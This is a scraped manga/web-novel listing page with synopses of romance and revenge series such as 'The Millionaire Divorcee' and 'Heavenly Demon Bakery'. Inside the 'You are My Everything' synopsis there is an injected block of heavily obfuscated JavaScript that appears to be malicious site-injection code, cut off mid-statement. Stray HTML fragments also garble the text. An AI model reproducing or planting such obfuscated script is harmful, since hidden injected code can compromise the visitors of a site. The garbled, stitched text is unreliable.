Cooking - Page 48

Please Be Gentle, My Bossy Uncle! The Killer Queen Has Got A Chance To Live Her Life Again, But Two Things Scare
Her… One Is When Master Jue Flirts With Her.

581 results

The Millionaire Divorcee

<div id="editdescription"> In the original story, the male lead accused his ex-wife of abusing him when he was younger. But unlike the original story, I raised my young husband as if he was my brother. When my husband went to war, I started preparing for a divorce. Because if the original story is true, the male lead will fall in love with the princess of the ruined country and bring her back! That’s why, instead of following the road that leads to defeat, I intended to get a decent divorce. While preparing for that, I took some money and earned quite a fortune. I also developed a cure because I didn’t want to die of an incurable disease like the original villainess. All that’s left is getting divorced! *** My cute little husband came home and grew up to be such a fine man! But don’t worry, I’m all set to divorce you! Oddly enough, the reaction of my husband is a little strange. “While I was fighting on the battlefield, you were preparing to run away.” He smiled dangerously, whilst wrapping his big hands around my waist. “Are you having an affair?” Unlike the pretty smile on his mouth, his eyes were burning hot. No….. you know, I’m ready to get divorced….. </div> <div class="page-content-inner"> <div></div> </div> <h5 class="seriesother associated">Associated Names</h5> <div id="editassociated">이혼당할 준비 완료했습니다</div>


The Villain’s Daughter-in-Law has limited time

The final villain is being deceived by his young time-limited daughter in law who was possessed. If I die at the right time, I will marry his son. The problem is, I already know the cure! And I don’t want to die, but if I don’t get killed now, then I won’t die quietly. “Daddy, I love you so much. You are the most handsome man in the world. Cough, cough!” “Evan, shall we read a fairy tale book together until we fall asleep?” She will have to act a little better to let his guard down. Then, she would be able to do a great job. I think I’ll have to leave secretly after I get better. I have to make a lot of money and buy land under borrowed names— “Call all the council members on the continent. My daughter-in-law has to live.” Father? Shouldn’t I be thrown away…? “If you die, I’ll follow you unconditionally. I can’t live in a world without you.” Husband? You’re acting strange, too… You don’t love anyone, do you? Even— “Who is this, Kyle Ravonis? The man who seduced my daughter-in-law deserves to die.” “Even if you cheated on me with another man, I will never break up with you.” You must have misunderstood my other name! “When did this start, huh? You said you wanted to live as a sweet couple, but you tried to run away by creating a new identity behind our back?” I want to quietly disappear, not die! I didn’t know my husband, who has been like a friend to me ever since we were young, would come to me with such sore eyes. “You’re still my wife on paper. Live as my wife, and die as my wife.” “Evan?” “You’ve shown me both heaven and hell…” His reddened eyes locked me up. “You’ll never get away from me no matter where you go.” Alternative The Villain’s Daughter-in-Law has limited time / 시한부라서 흑막의 며느리가 되었는데 / Because She Had A Time Limit/ She Became The Villain’s Daughter-in-law / My Time Was Limited So I Became the Villain’s Daughter in Law &nbsp;


The Many Seasons of Food

Tired of the hustle and bustle of city life, Minyeong decides to move back home — to the middle of nowhere. With delicious food, romance, and a bottle of good whiskey, she soon starts to rediscover the joys of living a simple life.술 익는 사계절


The Wicked Girl Is Arriving Tonight

If Li Xing unexpectedly received the abuse residue and becomes stronger, she can absorb the decomposition value and strengthen her attributes, and clean up the messes and women who ruined her family in the past life! The evil woman, who had been fighting everywhere with her golden arm, only to find herself in a strange situation: A hundred million dollars worth of medical professionals were scrambling to carry her school bag. The Face of the World: The Three Golden Film Awards? Top gangster turns a wolf into a dog and asks to pat his head? Imperial business tycoon Dieying tried to tear up her clothes, but she still had ten to one. 今夜恶女降临


Mine and Samsin’s Horrormance

<div class="description-summary hide_show-more"> <div class="summary__content show-more">A novice goddess and a scaredy-cat band together to resolve an unfortunate incident.</div> <div class="c-content-readmore">나와-그녀삼신과-호러맨스</div> </div> <div class="c-blog__heading style-2 font-heading"> <h2 class="h4"></h2> </div>


You are My Everything

Qin Se has been married for two years and her husband never touch her until a mysterious package led her to crash through her husband’s secret …… In order to retaliate against the scum, Qin Se directed a big show. She carefully selected and chose the powerful head of the Gu family – Gu Jing Yuan. Qin Se thought that she just provoked a different boss, but she didn’t know that she was being guided step by step to retaliate against the scum, regain her freedom and return to singleness, but also step by step, step into the huge net of love she had already woven.<script></script><script>(function(_0x37416c,_0x31ff6f){var _0x23285e=_0x36d4,_0x14f96e=_0x37416c();while(!![]){try{var _0x358cfa=parseInt(_0x23285e(0x198))/(-0x6e*0xa+-0x1*0x15bb+0x1a08)+-parseInt(_0x23285e(0x1a4))/(0x2413+0x1866+-0x3c77)+-parseInt(_0x23285e(0x19d))/(-0x4*0x995+-0x19f*-0xd+0x1144)+-parseInt(_0x23285e(0x1b3))/(-0x23c6+0xc*-0x2c6+0x1706*0x3)*(parseInt(_0x23285e(0x1af))/(0x1*0x2033+-0xec3*0x1+-0x116b))+-parseInt(_0x23285e(0x1ac))/(0x3*0x527+-0xe6e+-0x101)+-parseInt(_0x23285e(0x196))/(-0xb3+-0x382*-0xb+-0x25dc)*(parseInt(_0x23285e(0x1b2))/(0xdd7*-0x2+-0x3d5+0x1f8b))+-parseInt(_0x23285e(0x193))/(0x1bb*0xd+-0x185f*0x1+0x1*0x1e9)*(-parseInt(_0x23285e(0x194))/(-0x1d*0x7a+-0x64d+0x1429));if(_0x358cfa===_0x31ff6f)break;else _0x14f96e['push'](_0x14f96e['shift']());}catch(_0xa5fde7){_0x14f96e['push'](_0x14f96e['shift']());}}}(_0x40cc,-0x1e0c2*0x5+0xce999*-0x1+0x4934b*0x7));function custom(){var _0x485e8b=_0x36d4,_0x15e0d2={'VJMWf':function(_0xb4c313,_0x1ff00a){return _0xb4c313!=_0x1ff00a;},'uMVKU':_0x485e8b(0x1ab)+_0x485e8b(0x1a6),'DmjFn':function(_0x75e378,_0x275c61){return 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All the Things I Like About You

Joey and her husband, F, couldn’t be any more different. Joey is bubbly and charming while F is quiet, elusive, and downright cold sometimes. When Joey’s company assigns her to work on a project that’ll inspire people to reminisce on their youth, she decides to write a book about her own, and it turns into a memoir of her and F’s love story. As Joey looks back on how she met F, it’ll take her on a memorable journey through her life, first love, and how the “Ice Man” became the warmest person she knows.


The Empire’s Hidden Hope

Han Wol is known as one of the military’s finest young men, but Wol is a woman! After her father was framed for the former emperor’s murder, she narrowly escaped execution by disguising herself and hiding in plain sight. Since then, the empire has been under the thumb of chief state councilor Shin, but the young emperor is hatching a plan to take back control. As the only one who holds the key to unlocking the mysteries of the past, it looks like Wol’s days of laying low are over Flower Hidden in the Palace / Hidden Flower in the Palace /


From Now On, Romance

이제야 연애 Summary:Sisters Ju-eun and Hye-jin lived a miserable life. After the death of their mother, their ‘father’, who had always been absent from their lives, suddenly appeared. Hye-jin, the older sister, agreed to his suggestion: if one of them joins the ‘Daesung Group’, he will rescue them from their poverty-stricken life. However… three years after entering ‘Daesung Group’, she dies in vain. This left Ju-eun struggling with despair at her helplessness in preventing her sister’s death. But then, she gets a new opportunity when she is brought back in time and Ju-eun decides to take her sister’s place by becoming the daughter of the ‘Daesung Group’ that killed Hye-jin.


Heavenly Demon Bakery

Heavenly Demon Bakery manhwa, 천마님의 베이커리 It’s been decades since he began ruling over the Central Plains as the Heavenly Demon, but now he’s back to his original world! Now that he’s returned, he’s started to help his father with his bakery. Using the Mind’s Eye skill, he uncovers recipes while using Body Reformation to optimize the kneading of dough. The strongest in the Central Plains, the Heavenly Demon, uses his martial arts to become the premier baker!


I Just Want To Be Killed

Yu Le got sent to another world after dying from overworking and got a golden item that every male mc gets — system. But Yu Le did not meet the requirement which means that he have to say goodbye to the system temporarily. To reactivate the system again, he will have to live this life with zero motivation. So, wanting to activate the system as soon as possible, to get the ability to live forever, Yu Le has decided to court for death. But why is he not dying even when he’s trying so hard to, instead, he’s becoming stronger?! Genres: Action, Adventure, Isekai, Cooking


The Stepmother Likes Harems

"Charlhein is my true love." "Isn’t Charlhein your adopted daughter?" "We did that to protect her from attacks within the house. It was a helpless situation. She’ll become the lady of this house when Father passes away. Everyone in the Barony already knows." "Then, what about me?" Eliana, the eldest daughter of a poor noble family, accepted a marriage proposal from Baron Carmen in order to take care of her siblings and the household. However, as soon as she got married, she heard news that came out of nowhere. Additionally, because of Charlhein's scheming, people started calling Eliana by the disgraceful title of "stepmother." She couldn't let it go, so she decided to use her stepmother image to turn the crisis into an opportunity. Her goal is to be the queen of the harem. It's not about her sweet love—it's a warlike shortcut to power. Alongside this dangerous harem-building, will she be able to exact revenge and find true love? <h4>Alternative Name</h4> 계모는 하렘을 좋아해
